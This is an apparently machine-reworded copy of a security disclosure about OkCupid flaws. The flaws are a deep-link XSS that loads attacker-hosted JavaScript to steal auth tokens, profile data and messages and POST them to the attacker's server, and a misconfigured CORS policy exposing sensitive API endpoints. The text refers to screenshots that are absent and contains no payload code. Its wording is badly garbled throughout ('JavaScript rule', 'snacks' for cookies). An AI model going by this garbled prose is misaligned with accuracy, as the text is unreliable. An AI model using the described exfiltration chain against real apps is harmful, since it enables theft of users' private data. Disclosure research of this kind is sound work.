Fragile Data visibility & Performing actions with respect to the target

Fragile Data visibility & Performing actions with respect to the target

As much as this aspect, we’re able to launch the OkCupid mobile application utilizing a deep website website website link, containing a malicious JavaScript rule into the area parameter. The after screenshot shows the ultimate XSS payload which loads jQuery and then lots JavaScript rule through the attacker’s server: (please be aware top of the part offers the XSS payload plus the base section is the identical payload encoded with URL encoding):

The screenshot that is following an HTTP GET demand containing the ultimate XSS payload (part parameter):

The host replicates the payload sent earlier into the day in the area parameter as well as the injected JavaScript code is performed when you look at the context of this WebView.

As previously mentioned before, the last XSS payload lots a script file through the attacker’s host. The loaded code that is javaScript be properly used for exfiltration and account contains 3 functions:

  1. steal_token – Steals users’ verification token, oauthAccessToken, and also the users’ id, userid. Users’ sensitive information (PII), such as for instance current email address, is exfiltrated too.
  2. steal_data – Steals users’ profile and data that are private choices, users’ characteristics ( e.g. responses filled during registration), and much more.
  3. Send_data_to_attacker – send the data collected in functions 1 and 2 towards the attacker’s host.

steal_token function:

The big event produces A api call to the host. Users cookies that are provided for the host considering that the XSS payload is performed into the context for the application’s WebView.

The host responds with A json that is vast the users’ id therefore the authentication token also:

Steal information function:

The big event produces an HTTP request endpoint.

In line with the data exfiltrated into the steal_token function, the demand will be delivered using the verification token additionally the user’s id.

The host reacts with the information about the victim’s profile, including e-mail, intimate orientation, height, family members status, etc.

Forward information to attacker function:

The event produces a POST request to your attacker’s host containing all the information retrieved in the past function phone calls (steal_token and steal_data functions).

The screenshot that is following an HTTP POST demand provided for the attacker’s host. The demand human anatomy contains all the victim’s sensitive and painful information:

Performing actions with respect to the target can be feasible as a result of the exfiltration associated with victim’s verification token together with users’ id. These records can be used into the harmful JavaScript rule (just like used in the steal_data function).

An assailant can perform actions such as forward messages and alter profile data as a result of information exfiltrated into the function that is steal_token

  1. Authentication token, oauthAccessToken, is employed within the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform complete account takeover because the cookies are protected with HTTPOnly.

the data exfiltrated into the function that is steal_token

  1. Authentication token, oauthAccessToken, can be used when you look at the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform account that is full because the snacks are protected with HTTPOnly.

Online Platform Vulnerabilities Mis-configured Cross-Origin Resource Sharing Policy Results In Fragile Information Publicity

for the duration of the study, we’ve discovered that the CORS policy associated with API host api.OkCupid.com isn’t configured precisely and any beginning can deliver needs into the host and read its’ reactions. The after demand shows a demand delivered the API host through the beginning

The host will not validate the origin properly and reacts because of the required information. Furthermore, the server reaction contains Access-Control-Allow-Origin: and Access-Control-Allow-Credentials: real headers:

As of this point on, we recognized that individuals can deliver needs towards the API host from our domain without having to be obstructed by the CORS policy.

Once a target is authenticated on OkCupid application and browsing to your attacker’s internet application, an HTTP GET demand is provided for containing the victim’s snacks. The server’s response has A json that is vast containing the victim’s verification token and also the victim’s user_id.

We’re able to find a lot more data that are useful the bootstrap API endpoint – sensitive and painful API endpoints into the API host:

The screenshot that is following sensitive and painful PII data exfiltration from the /profile/ API endpoint, utilizing the victim’s user_id plus the access_token:

The screenshot that is following exfiltration for the victim’s communications through the /1/messages/ API endpoint, utilizing the victim’s user_id therefore the access_token:

Summary

The field of online-dating apps is rolling out quickly over the years, and matured to where it’s at today using the change to a world that is digital particularly in the past 6 months – considering that the outbreak of Coronavirus around the world. The “new normal” habits such as as “social distancing” have actually pressed the dating globe to entirely depend on electronic tools for help.

The study provided right here shows the potential risks related to one of several longest-established & most apps that are popular its sector. The need that is dire privacy and information protection becomes a lot more essential whenever a great deal personal and intimate information being stored, handled and analyzed in a application. The application and platform is made to create individuals together, but of course where individuals get, crooks will observe, hunting for simple pickings.

Leave a Reply